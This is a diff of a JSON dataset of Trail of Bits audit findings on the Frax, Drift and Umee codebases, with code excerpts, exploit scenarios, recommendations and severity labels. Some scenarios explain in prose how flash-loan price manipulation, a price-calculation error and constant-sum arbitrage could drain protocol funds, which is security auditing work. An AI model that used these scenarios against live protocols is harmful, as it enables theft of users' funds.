FRAX amount by the collateral price to get the equivalent collateral amount (gure 5.2). function getFRAXInCollateral ( uint256 col_idx , uint256 frax_amount ) public view returns ( uint256 ) { return frax_amount.mul(PRICE_PRECISION).div( 10 ** missing_decimals[col_idx]). div(collateral_prices[col_idx]) ; } Figure 5.2: The getFraxInCollateral function ( FraxPoolV3.sol#242244 ) Exploit Scenario A collateral price takes on a value other than 1 . This can happen through either a call to setCollateralPrice or future modications that fetch the price from an oracle (also see issue TOB-FRSOL-009 ). A collateral asset is worth $1,000. Alice mints 1,000 FRAX for 1 unit of collateral. Alice then redeems 1,000 FRAX for 1 million units of collateral ( ). As a result, Alice has stolen around $1 billion from the protocol. If the calculation were 1000 / 1000 correct, Alice would have redeemed her 1,000 FRAX for 1 unit of collateral ( 1000 1000 ). Recommendations Short term, in FraxPoolV3.redeemFrax , use the existing getFraxInCollateral helper function (gure 5.2) to compute the collateral amount that is equivalent to a given FRAX amount. Long term, verify that all calculations involving prices use the above rules 1 and 2 correctly.", + "title": "15. Code duplication ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "Various les in the programs/drift directory contain duplicate code, which can lead to incomplete xes or inconsistent behavior (e.g., because the code is modied in one location but not all). As an example, the code in gure 15.1 appears nearly verbatim in the functions liquidate_perp , liquidate_spot , liquidate_borrow_for_perp_pnl , and liquidate_perp_pnl_for_deposit . // check if user exited liquidation territory let (intermediate_total_collateral, intermediate_margin_requirement_with_buffer) = if !canceled_order_ids.is_empty() || lp_shares > 0 { ... // 37 lines ( intermediate_total_collateral, intermediate_margin_requirement_plus_buffer, ) } else { (total_collateral, margin_requirement_plus_buffer) }; Figure 15.1: programs/drift/src/controller/liquidation.rs#L201L246 In some places, the text itself is not obviously duplicated, but the logic it implements is clearly duplicated. An example appears in gures 15.2 and 15.3. Such logical code duplication suggests the code does not use the right abstractions. // Update Market open interest if let PositionUpdateType::Open = update_type { if position.quote_asset_amount == 0 && position.base_asset_amount == 0 { market.number_of_users = market.number_of_users.safe_add( 1 )?; } market.number_of_users_with_base = market.number_of_users_with_base.safe_add( 1 )?; } else if let PositionUpdateType::Close = update_type { if new_base_asset_amount == 0 && new_quote_asset_amount == 0 { market.number_of_users = market.number_of_users.safe_sub( 1 )?; } market.number_of_users_with_base = market.number_of_users_with_base.safe_sub( 1 )?; } Figure 15.2: programs/drift/src/controller/position.rs#L162L175 if position.quote_asset_amount == 0 && position.base_asset_amount == 0 { market.number_of_users = market.number_of_users.safe_add( 1 )?; } position.quote_asset_amount = position.quote_asset_amount.safe_add(delta)?; market.amm.quote_asset_amount = market.amm.quote_asset_amount.safe_add(delta.cast()?)?; if position.quote_asset_amount == 0 && position.base_asset_amount == 0 { market.number_of_users = market.number_of_users.safe_sub( 1 )?; } Figure 15.3: programs/drift/src/controller/position.rs#L537L547 Exploit Scenario Alice, a Drift Protocol developer, is asked to x a bug in liquidate_perp . Alice does not realize that the bug also applies to liquidate_spot , liquidate_borrow_for_perp_pnl , and liquidate_perp_pnl_for_deposit , and xes the bug in only liquidate_perp . Eve discovers that the bug is not xed in one of the other three functions and exploits it. Recommendations Short term: Refactor liquidate_perp , liquidate_spot , liquidate_borrow_for_perp_pnl , and liquidate_perp_pnl_for_deposit to eliminate the code duplication. This will reduce the likelihood of an incomplete x for a bug aecting more than one of these functions. Identify cases where the code uses the same logic, and implement abstractions to capture that logic. Ensure that code that relies on such logic uses the new abstractions. Consolidating similar pieces of code will make the overall codebase easier to reason about. Long term, adopt code practices that discourage code duplication. This will help to prevent this problem from recurring.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "6. spotPriceOHM is vulnerable to manipulation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The OHM_AMO contract uses the Uniswap V2 spot price to calculate the value of the collateral that it holds. This price can be manipulated by making a large trade through the OHM-FRAX pool. An attacker can manipulate the apparent value of collateral and thereby change the collateralization rate at will. FraxPoolV3 appears to contain the most funds at risk, but any contract that uses FRAX.globalCollateralValue is susceptible to a similar attack. (It looks like Pool_USDC has buybacks paused, so it should not be able to burn FXS, at the time of writing.) function spotPriceOHM () public view returns ( uint256 frax_per_ohm_raw , uint256 frax_per_ohm ) { ( uint256 reserve0 , uint256 reserve1 , ) = (UNI_OHM_FRAX_PAIR.getReserves()); // OHM = token0, FRAX = token1 frax_per_ohm_raw = reserve1.div(reserve0); frax_per_ohm = reserve1.mul(PRICE_PRECISION).div(reserve0.mul( 10 ** missing_decimals_ohm)); } Figure 6.1: old_contracts/Misc_AMOs/OHM_AMO.sol#L174-L180 FRAX.globalCollateralValue loops through frax_pools_array , including OHM_AMO , and aggregates collatDollarBalance . The collatDollarBalance for OHM_AMO is calculated using spotPriceOHM and thus is vulnerable to manipulation. function globalCollateralValue() public view returns ( uint256 ) { uint256 total_collateral_value_d18 = 0 ; for ( uint i = 0 ; i < frax_pools_array.length; i++){ // Exclude null addresses if (frax_pools_array[i] != address ( 0 )){ total_collateral_value_d18 = total_collateral_value_d18.add(FraxPool(frax_pools_array[i]).collatDollarBalance()); } } return total_collateral_value_d18; } Figure 6.2: contracts/Frax/Frax.sol#L180-L191 buyBackAvailableCollat returns the amount the protocol will buy back if the aggregate value of collateral appears to back each unit of FRAX with more than is required by the current collateral ratio. Since globalCollateralValue is manipulable, the protocol can be articially forced into buying (burning) FXS shares and paying out collateral. function buybackAvailableCollat () public view returns ( uint256 ) { uint256 total_supply = FRAX.totalSupply(); uint256 global_collateral_ratio = FRAX.global_collateral_ratio(); uint256 global_collat_value = FRAX.globalCollateralValue(); if (global_collateral_ratio > PRICE_PRECISION) global_collateral_ratio = PRICE_PRECISION; // Handles an overcollateralized contract with CR > 1 uint256 required_collat_dollar_value_d18 = (total_supply.mul(global_collateral_ratio)).div(PRICE_PRECISION); // Calculates collateral needed to back each 1 FRAX with $1 of collateral at current collat ratio if (global_collat_value > required_collat_dollar_value_d18) { // Get the theoretical buyback amount uint256 theoretical_bbk_amt = global_collat_value.sub(required_collat_dollar_value_d18); // See how much has collateral has been issued this hour uint256 current_hr_bbk = bbkHourlyCum[curEpochHr()]; // Account for the throttling return comboCalcBbkRct(current_hr_bbk, bbkMaxColE18OutPerHour, theoretical_bbk_amt); } else return 0 ; } Figure 6.3: contracts/Frax/Pools/FraxPoolV3.sol#L284-L303 buyBackFXS calculates the amount of FXS to burn from the user, calls b urn on the FRAXShares contract, and sends the caller an equivalent dollar amount in USDC. function buyBackFxs ( uint256 col_idx , uint256 fxs_amount , uint256 col_out_min ) external collateralEnabled(col_idx) returns ( uint256 col_out ) { require (buyBackPaused[col_idx] == false , \"Buyback is paused\" ); uint256 fxs_price = getFXSPrice(); uint256 available_excess_collat_dv = buybackAvailableCollat(); // If the total collateral value is higher than the amount required at the current collateral ratio then buy back up to the possible FXS with the desired collateral require (available_excess_collat_dv > 0 , \"Insuf Collat Avail For BBK\" ); // Make sure not to take more than is available uint256 fxs_dollar_value_d18 = fxs_amount.mul(fxs_price).div(PRICE_PRECISION); require (fxs_dollar_value_d18 <= available_excess_collat_dv, \"Insuf Collat Avail For BBK\" ); // Get the equivalent amount of collateral based on the market value of FXS provided uint256 collateral_equivalent_d18 = fxs_dollar_value_d18.mul(PRICE_PRECISION).div(collateral_prices[col_idx]); col_out = collateral_equivalent_d18.div( 10 ** missing_decimals[col_idx]); // In its natural decimals() // Subtract the buyback fee col_out = (col_out.mul(PRICE_PRECISION.sub(buyback_fee[col_idx]))).div(PRICE_PRECISION); // Check for slippage require (col_out >= col_out_min, \"Collateral slippage\" ); // Take in and burn the FXS, then send out the collateral FXS.pool_burn_from( msg.sender , fxs_amount); TransferHelper.safeTransfer(collateral_addresses[col_idx], msg.sender , col_out); // Increment the outbound collateral, in E18, for that hour // Used for buyback throttling bbkHourlyCum[curEpochHr()] += collateral_equivalent_d18; } Figure 6.4: contracts/Frax/Pools/FraxPoolV3.sol#L488-L517 recollateralize takes collateral from a user and gives the user an equivalent amount of FXS, including a bonus. Currently, the bonus_rate is set to 0 , but a nonzero bonus_rate would signicantly increase the protability of an attack. // When the protocol is recollateralizing, we need to give a discount of FXS to hit the new CR target // Thus, if the target collateral ratio is higher than the actual value of collateral, minters get FXS for adding collateral // This function simply rewards anyone that sends collateral to a pool with the same amount of FXS + the bonus rate // Anyone can call this function to recollateralize the protocol and take the extra FXS value from the bonus rate as an arb opportunity function recollateralize( uint256 col_idx, uint256 collateral_amount, uint256 fxs_out_min) external collateralEnabled(col_idx) returns ( uint256 fxs_out) { require (recollateralizePaused[col_idx] == false , \"Recollat is paused\" ); uint256 collateral_amount_d18 = collateral_amount * ( 10 ** missing_decimals[col_idx]); uint256 fxs_price = getFXSPrice(); // Get the amount of FXS actually available (accounts for throttling) uint256 fxs_actually_available = recollatAvailableFxs(); // Calculated the attempted amount of FXS fxs_out = collateral_amount_d18.mul(PRICE_PRECISION.add(bonus_rate).sub(recollat_fee[col_idx]) ).div(fxs_price); // Make sure there is FXS available require (fxs_out <= fxs_actually_available, \"Insuf FXS Avail For RCT\" ); // Check slippage require (fxs_out >= fxs_out_min, \"FXS slippage\" ); // Don't take in more collateral than the pool ceiling for this token allows require (freeCollatBalance(col_idx).add(collateral_amount) <= pool_ceilings[col_idx], \"Pool ceiling\" ); // Take in the collateral and pay out the FXS TransferHelper.safeTransferFrom(collateral_addresses[col_idx], msg.sender , address ( this ), collateral_amount); FXS.pool_mint( msg.sender , fxs_out); // Increment the outbound FXS, in E18 // Used for recollat throttling rctHourlyCum[curEpochHr()] += fxs_out ; } Figure 6.5: contracts/Frax/Pools/FraxPoolV3.sol#L519-L550 Exploit Scenario FraxPoolV3.bonus_rate is nonzero. Using a ash loan, an attacker buys OHM with FRAX, drastically increasing the spot price of OHM. When FraxPoolV3.buyBackFXS is called, the protocol incorrectly determines that FRAX has gained additional collateral. This causes the pool to burn FXS shares and to send the attacker USDC of the equivalent dollar value. The attacker moves the price in the opposite direction and calls recollateralize on the pool, receiving and selling newly minted FXS, including a bonus, for prot. This attack can be carried out until the buyback and recollateralize hourly cap, currently 200,000 units, is reached. Recommendations Short term, take one of the following steps to mitigate this issue: Call FRAX.removePool and remove OHM_AMO . Note, this may cause the protocol to become less collateralized. Call FraxPoolV3.setBbkRctPerHour and set bbkMaxColE18OutPerHour and rctMaxFxsOutPerHour to 0 . Calling toggleMRBR to pause USDC buybacks and recollateralizations would have the same eect. The implications of this mitigation on the long-term sustainability of the protocol are not clear. Long term, do not use the spot price to determine collateral value. Instead, use a time-weighted average price (TWAP) or an oracle such as Chainlink. If a TWAP is used, ensure that the underlying pool is highly liquid and not easily manipulated. Additionally, create a rigorous process to onboard collateral since an exploit of this nature could destabilize the system. References samczsun, \"So you want to use a price oracle\" euler-xyz/uni-v3-twap-manipulation", + "title": "16. Inconsistent use of integer types ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The Drift Protocol codebase uses integer types inconsistently; data of similar kinds is represented using dierently sized types or types with dierent signedness. Conversions from one integer type to another present an opportunity for the contracts to fail and should be avoided. For example, the pow method expects a u32 argument. However, in some places u128 values must be cast to u32 values, even though those values are intended to be used as exponents (gures 16.1, 16.2, and 16.3). let expo_diff = (spot_market.insurance_fund.shares_base - insurance_fund_stake.if_base) . cast::< u32 >() ?; let rebase_divisor = 10_ u128 .pow(expo_diff); Figure 16.1: programs/drift/src/controller/insurance.rs#L154L157 #[zero_copy] #[derive(Default, Eq, PartialEq, Debug)] #[repr(C)] pub struct InsuranceFund { pub vault: Pubkey , pub total_shares: u128 , pub user_shares: u128 , pub shares_base: u128 , pub unstaking_period: i64 , // if_unstaking_period pub last_revenue_settle_ts: i64 , pub revenue_settle_period: i64 , pub total_factor: u32 , // percentage of interest for total insurance pub user_factor: u32 , // percentage of interest for user staked insurance // exponent for lp shares (for rebasing) } Figure 16.2: programs/drift/src/state/spot_market.rs#L352L365 #[account(zero_copy)] #[derive(Default, Eq, PartialEq, Debug)] #[repr(C)] pub struct InsuranceFundStake { pub authority: Pubkey , if_shares: u128 , pub last_withdraw_request_shares: u128 , // get zero as 0 when not in escrow pub if_base: u128 , // exponent for if_shares decimal places (for rebase) pub last_valid_ts: i64 , pub last_withdraw_request_value: u64 , pub last_withdraw_request_ts: i64 , pub cost_basis: i64 , pub market_index: u16 , pub padding: [ u8 ; 14 ], } Figure 16.3: programs/drift/src/state/insurance_fund_stake.rs#L10L24 The following command reveals 689 locations where the cast method appears to be used: grep -r -I '\\.cast\\>' programs/drift Each such use could lead to a denial of service if an attacker puts the contract into a state where the cast always errors. Many of these uses could be eliminated by more consistent use of integer types. Note that Drift Protocol has indicated that some of the observed inconsistencies are related to reducing rent costs. Exploit Scenario Mallory manages to put the contract into a state such that one of the nearly 700 uses of cast always returns an error. The contract becomes unusable for Alice, who needs to execute a code path involving the vulnerable cast . Recommendations Short term, review all uses of cast to see which might be eliminated by changing the types of the operands. This will reduce the overall number of cast s and reduce the likelihood that one could lead to denial of service. Long term, as new code is introduced into the codebase, review the types used to hold similar kinds of data. This will reduce the likelihood that new cast s are needed.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "7. Return values of the Chainlink oracle are not validated ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The latestRoundData function returns a signed integer that is coerced to an unsigned integer without checking that the value is a positive integer. An overow (e.g., uint(-1) ) would drastically misrepresent the price and cause unexpected behavior. In addition, FraxPoolV3 does not validate the completion and recency of the round data, permitting stale price data that does not reect recent changes. function getFRAXPrice() public view returns ( uint256 ) { ( , int price, , , ) = priceFeedFRAXUSD.latestRoundData(); return uint256 (price).mul(PRICE_PRECISION).div( 10 ** chainlink_frax_usd_decimals); } function getFXSPrice() public view returns ( uint256 ) { ( , int price, , , ) = priceFeedFXSUSD.latestRoundData(); return uint256 (price).mul(PRICE_PRECISION).div( 10 ** chainlink_fxs_usd_decimals); } Figure 7.1: contracts/Frax/Pools/FraxPoolV3.sol#231239 An older version of Chainlinks oracle interface has a similar function, latestAnswer . When this function is used, the return value should be checked to ensure that it is a positive integer. However, round information does not need to be checked because latestAnswer returns only price data. Recommendations Short term, add a check to latestRoundData and similar functions to verify that values are non-negative before converting them to unsigned integers, and add an invariant that checks that the round has nished and that the price data is from the current round: require(updatedAt != 0 && answeredInRound == roundID) . Long term, dene a minimum update threshold and add the following check: require((block.timestamp - updatedAt <= minThreshold) && (answeredInRound == roundID)) . Furthermore, use consistent interfaces instead of mixing dierent versions. References Chainlink AggregatorV3Interface", + "title": "17. Use of opaque constants in tests ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "Several of the Drift Protocol tests use constants with no explanation for how they were derived, which makes it dicult to assess whether the tests are functioning correctly. Ten examples appear in gure 17.1. In each case, a variable or eld is compared against a constant consisting of 612 random-looking digits. Without an explanation for how these digits were obtained, it is dicult to tell whether the constant expresses the correct value. assert_eq! (user.spot_positions[ 0 ].scaled_balance, 45558159000 ); assert_eq! (user.spot_positions[ 1 ].scaled_balance, 406768999 ); ... assert_eq! (margin_requirement, 44744590 ); assert_eq! (total_collateral, 45558159 ); assert_eq! (margin_requirement_plus_buffer, 45558128 ); ... assert_eq! (token_amount, 406769 ); assert_eq! (token_value, 40676900 ); assert_eq! (strict_token_value_1, 4067690 ); // if oracle price is more favorable than twap ... assert_eq! (liquidator.spot_positions[ 0 ].scaled_balance, 159441841000 ); ... assert_eq! (liquidator.spot_positions[ 1 ].scaled_balance, 593824001 ); Figure 17.1: programs/drift/src/controller/liquidation/tests.rs#L1618L1687 Exploit Scenario Mallory discovers that a constant used in a Drift Protocol test was incorrectly derived and that the tests were actually verifying incorrect behavior. Mallory uses the bug to siphon funds from the Drift Protocol exchange. Recommendations Short term, where possible, compute values using an explicit formula rather than an opaque constant. If using an explicit formula is not possible, include a comment explaining how the constant was derived. This will help to ensure that correct behavior is being tested for. Moreover, the process of giving such explicit formulas could reveal errors. Long term, write scripts to identify constants with high entropy, and run those scripts as part of your CI process. This will help to ensure the aforementioned standards are maintained.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2432,99 +5190,99 @@ ] }, { - "title": "8. Unlimited arbitrage in CCFrax1to1AMM ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The CCFrax1to1AMM contract implements an automated market maker (AMM) with a constant price and zero slippage. It is a constant sum AMM that maintains the invariant = + , where the token balances. must remain constant during swaps (ignoring fees) and and are Constant sum AMMs are impractical because they are vulnerable to unlimited arbitrage. If the price dierence of the AMMs tokens in external markets is large enough, the most protable arbitrage strategy is to buy the total reserve of the more expensive token from the AMM, leaving the AMM entirely imbalanced. Other AMMs like Uniswap and Curve prevent unlimited arbitrage by making the price depend on the reserves. This limits prots from arbitrage to a fraction of the total reserves, as the price will eventually reach a point at which the arbitrage opportunity disappears. No such limit exists in the CCFrax1to1AMM contract. While arbitrage opportunities are somewhat limited by the token caps, fees, and gas prices, unlimited arbitrage is always possible once the reserves or the dierence between the FRAX price and the token price becomes large enough. While token_price swings are limited by the price_tolerance parameter, frax_price swings are not limited. Exploit Scenario The CCFrax1to1AMM contract is deployed, and price_tolerance is set to 0.05. A token is whitelisted with a token_cap of 100,000 and a swap_fee of 0.0004. A user transfers 100,000 FRAX to an AMM. The price of minimum at which the AMM allows swaps, and the price of FRAX in an external market becomes 1.005. Alice buys (or takes out a ash loan of) $100,000 worth of market. Alice swaps all of her external market, making a prot of $960. No FRAX remains in the AMM. in the external for FRAX with the AMM and then sells all of her FRAX in the in an external market becomes 0.995, the This scenario is conservative, as it assumes a balance of only 100,000 FRAX and a frax_price of 1.005. As frax_price and the balance increase, the arbitrage prot increases. Recommendations Short term, do not deploy CCFrax1to1AMM and do not fund any existing deployments with signicant amounts. Those funds will be at risk of being drained through arbitrage. Long term, when providing stablecoin-to-stablecoin liquidity, use a Curve pool or another proven and audited implementation of the stableswap invariant.", + "title": "18. Accounts from contexts are not always used by the instruction ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The context denition for the initialize instruction denes a drift_signer account. However, this account is not used by the instruction. It appears to be a remnant used to pass the address of the state PDA account; however, the need to do this was eliminated by the use of find_program_address to calculate the address. Also, in the initialize_insurance_fund_stake instruction, the spot_market , user_stats , and state accounts from the context are not used by the instruction. #[derive(Accounts)] pub struct Initialize <'info> { #[account(mut)] pub admin: Signer <'info>, #[account( init, seeds = [b \"drift_state\" .as_ref()], space = std::mem::size_of::() + 8, bump, payer = admin )] pub state: Box >, pub quote_asset_mint: Box >, /// CHECK: checked in `initialize` pub drift_signer: AccountInfo <'info>, pub rent: Sysvar <'info, Rent>, pub system_program: Program <'info, System>, pub token_program: Program <'info, Token>, } Figure 18.1: programs/drift/src/instructions/admin.rs#L1989L2007 Exploit Scenario Alice, a Drift Protocol developer, assumes that the drift_signer account is used by the instruction, and she uses a dierent address for the account, expecting this account to hold the contract state after the initialize instruction has been called. Recommendations Short term, remove the unused account from the context. This eliminates the possibility of confusion around the use of the accounts. Long term, employ a process where a refactoring of an instructions code is followed by a review of the corresponding context denition. This ensures that the context is in sync with the instruction handlers.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "9. Collateral prices are assumed to always be $1 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "In the FraxPoolV3 contract, the setCollateralPrice function sets collateral prices and stores them in the collateral_prices mapping. As of December 13, 2021, collateral prices are set to $1 for all collateral types in the deployed version of the FraxPoolV3 contract. Currently, only stablecoins are used as collateral within the Frax Protocol. For those stablecoins, $1 is an appropriate price approximation, at most times. However, when the actual price of the collateral diers enough from $1, users could choose to drain value from the protocol through arbitrage. Conversely, during such price uctuations, other users who are not aware that FraxPoolV3 assumes collateral prices are always $1 can receive less value than expected. Collateral tokens that are not pegged to a specic value, like ETH or WBTC, cannot currently be used safely within FraxPoolV3 . Their prices are too volatile, and repeatedly calling setCollateralPrice is not a feasible solution to keeping their prices up to date. Exploit Scenario The price of FEI, one of the stablecoins collateralizing the Frax Protocol, changes to $0.99. Alice, a user, can still mint FRAX/FXS as if the price of FEI were $1. Ignoring fees, Alice can buy 1 million FEI for $990,000, mint 1 million FRAX/FXS with the 1 million FEI, and sell the 1 million FRAX/FXS for $1 million, making $10,000 in the process. As a result, the Frax Protocol loses $10,000. If the price of FEI changes to $1.01, Bob would expect that he can exchange his 1 million FEI for 1.01 million FRAX/FXS. Since FraxPoolV3 is not aware of the actual price of FEI, Bob receives only 1 million FRAX/FXS, incurring a 1% loss. Recommendations Short term, document the arbitrage opportunities described above. Warn users that they could lose funds if collateral prices dier from $1. Disable the option to set collateral prices to values not equal to $1. Long term, modify the FraxPoolV3 contract so that it fetches collateral prices from a price oracle.", + "title": "19. Unaligned references are allowed ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The Drift Protocol codebase uses the #![allow(unaligned_references)] attribute. This allows the use of unaligned references throughout the program and could mask serious problems in future updates to the contract. #![allow(clippy::too_many_arguments)] #![allow(unaligned_references)] #![allow(clippy::bool_assert_comparison)] #![allow(clippy::comparison_chain)] Figure 19.1: programs/drift/src/lib.rs#L1L4 Exploit Scenario Alice, a Drift Protocol developer, accidentally introduces errors caused by the use of unaligned references, aecting the contract operation and leading to a loss of funds. Recommendations Short term, remove the attributes. This ensures that the check for unaligned references correctly ag such cases. Long term, be conservative with the use of attributes used to suppress warnings or errors throughout the codebase. If possible, apply them to only the minimum possible amount of code. This minimizes the risk of problems stemming from the suppressed checks.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "10. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "Frax Finance has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc -js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the Frax Finance contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "title": "20. Size of created accounts derived from in-memory representation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "When state accounts are initialized, the size of the account is set to std::mem::size_of::() + 8 , where the eight extra bytes are used for the discriminator. The structs for the state types all have a trailing eld with padding, seemingly to ensure the account size is aligned to eight bytes and to determine the size of the account. In other places, the code relies on the size_of function to determine the type of accounts passed to the instruction. While we could not nd any security-related problem with the scheme today, this does mean that every accounts in-memory representation is inated by the amount of padding, which could become a problem with respect to the limitation of the stack or heap size. Furthermore, if any of the accounts are updated in such a way that the repr(C) layout size diers from the Anchor space reference , it could cause a problem. For example, if the SpotMarket struct is changed so that its in-memory representation is smaller than the required Anchor size, the initialize_spot_market would fail because the created account would be too small to hold the serialized representation of the data. #[account] #[derive(Default)] #[repr(C)] pub struct State { pub admin: Pubkey , pub whitelist_mint: Pubkey , pub discount_mint: Pubkey , pub signer: Pubkey , pub srm_vault: Pubkey , pub perp_fee_structure: FeeStructure , pub spot_fee_structure: FeeStructure , pub oracle_guard_rails: OracleGuardRails , pub number_of_authorities: u64 , pub number_of_sub_accounts: u64 , pub lp_cooldown_time: u64 , pub liquidation_margin_buffer_ratio: u32 , pub settlement_duration: u16 , pub number_of_markets: u16 , pub number_of_spot_markets: u16 , pub signer_nonce: u8 , pub min_perp_auction_duration: u8 , pub default_market_order_time_in_force: u8 , pub default_spot_auction_duration: u8 , pub exchange_status: ExchangeStatus , pub padding : [ u8 ; 17 ], } Figure 20.1: The State struct, with corresponding padding #[account( init, seeds = [b \"drift_state\" .as_ref()], space = std::mem::size_of::() + 8 , bump, payer = admin )] pub state: Box >, Figure 20.2: The creation of the State account, using the in-memory size if data.len() < std::mem::size_of::() + 8 { return Ok (( None , None )); } Figure 20.3: An example of the in-memory size used to determine the account type Exploit Scenario Alice, a Drift Protocol developer, unaware of the implicit requirements of the in-memory size, makes changes to a state accounts structure or adds a state structure account such that the in-memory size is smaller than the size needed for the serialized data. As a result, instructions in the contract that save data to the account will fail. Recommendations Short term, add an implementation to each state struct that returns the size to be used for the corresponding Solana account. This avoids the overhead of the padding and removes the dependency on assumption about the in-memory size. Long term, avoid using assumptions about in-memory representation of type within programs created in Rust. This ensures that changes to the representation do not aect the program's operation.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "11. Users are unable to limit the amount of collateral paid to FraxPoolV3 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The amount of collateral and FXS that is paid by the user in mintFrax is dynamically computed from the collateral ratio and price. These parameters can change between transaction creation and transaction execution. Users currently have no way to ensure that the paid amounts are still within acceptable limits at the time of transaction execution. Exploit Scenario Alice wants to call mintFrax . In the time between when the transaction is broadcast and executed, the global collateral ratio, collateral, and/or FXS prices change in such a way that Alice's minting operation is no longer protable for her. The minting operation is still executed, and Alice loses funds. Recommendations Short term, add the maxCollateralIn and maxFXSIn parameters to mintFrax , enabling users to make the transaction revert if the amount of collateral and FXS that they would have to pay is above acceptable limits. Long term, always add such limits to give users the ability to prevent unacceptably large input amounts and unacceptably small output amounts when those amounts are dynamically computed.", + "title": "1. Integer overow in Peggo's deploy-erc20-raw command ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The denom-decimals argument of the deploy-erc20-raw command (in the deployERC20RawCmd function) may experience an integer overow. The argument is rst parsed into a value of the int type by the strconv.Atoi function and then cast to a value of the uint8 type (gure 1.1). If the denom-decimals argument with which deploy-erc20-raw is invoked is a negative value or a value that is too large, the casting operation will cause an overow; however, the user will not receive an error, and the execution will proceed with the overow value. func deployERC20RawCmd() *cobra.Command { return &cobra.Command{ Use: \"deploy-erc20-raw [gravity-addr] [denom-base] [denom-name] [denom-symbol] [denom-decimals]\" , /* (...) */ , RunE: func (cmd *cobra.Command, args [] string ) error { denomDecimals, err := strconv.Atoi(args[ 4 ]) if err != nil { return fmt.Errorf( \"invalid denom decimals: %w\" , err) } tx, err := gravityContract.DeployERC20(auth, denomBase, denomName, denomSymbol, uint8 (denomDecimals) ) Figure 1.1: peggo/cmd/peggo/bridge.go#L348-L353 We identied this issue by running CodeQL's IncorrectIntegerConversionQuery.ql query. Recommendations Short term, x the integer overow in Peggos deployERC20RawCmd function by using the strconv.ParseUint function to parse the denom-decimals argument. To do this, use the patch in gure 1.2. diff --git a/cmd/peggo/bridge.go b/cmd/peggo/bridge.go index 49aabc5..4b3bc6a 100644 --- a/cmd/peggo/bridge.go +++ b/cmd/peggo/bridge.go @@ -345,7 +345,7 @@ network starting.`, - + denomBase := args[ 1 ] denomName := args[ 2 ] denomSymbol := args[ 3 ] denomDecimals, err := strconv.Atoi(args[ 4 ]) denomDecimals, err := strconv.ParseUint(args[ 4 ], 10 , 8 ) if err != nil { return fmt.Errorf( \"invalid denom decimals: %w\" , err) } Figure 1.2: A patch for the integer overow issue in Peggo's deploy-erc20-raw command Long term, integrate CodeQL into the CI/CD pipeline to nd similar issues in the future.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "12. Incorrect default price tolerance in CCFrax1to1AMM ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The price_tolerance state variable of the CCFrax1to1AMM contract is set to 50,000, which, when using the xed point scaling factor inconsistent with the variables inline comment, which indicates the number 5,000, corresponding to 0.005. A price tolerance of 0.05 is probably too high and can lead to unacceptable arbitrage activities; this suggests that price_tolerance should be set to the value indicated in the code comment. 6 1 0 , corresponds to 0.05. This is uint256 public price_tolerance = 50000 ; // E6. 5000 = .995 to 1.005 Figure 12.1: The price_tolerance state variable ( CCFrax1to1AMM.sol#56 ) Exploit Scenario This issue exacerbates the exploit scenario presented in issue TOB-FRSOL-008 . Given that scenario, but with a price tolerance of 50,000, Alice is able to gain $5459 through arbitrage. A higher price tolerance leads to higher arbitrage prots. Recommendations Short term, set the price tolerance to 5,000 both in the code and on the deployed contract. Long term, ensure that comments are in sync with the code and that constants are correct.", + "title": "2. Rounding of the standard deviation value may deprive voters of rewards ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The ExchangeRateBallot.StandardDeviation function calculates the standard deviation of the exchange rates submitted by voters. To do this, it converts the variance into a oat, prints its square root to a string, and parses it into a Dec value (gure 2.1). This logic rounds down the standard deviation value, which is likely unexpected behavior; if the exchange rate is within the reward spread 